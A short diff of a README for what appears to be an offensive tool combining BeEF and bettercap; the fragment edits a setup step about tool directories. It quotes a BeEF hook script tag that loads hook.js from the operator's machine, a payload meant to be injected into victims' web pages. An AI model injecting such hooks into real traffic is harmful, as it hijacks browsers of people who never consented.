sysgerm/krimp/README.md

 `<script src="http://<local ip>:3000/hook.js"></script>`

 ## Configurate the script
-- Change the directories in the script to your installation of beEF and bettercap.
+- Change the directories in the script to your installation of beEF and bettercap OR run the install script, it will do everything for you.

 ## Running the script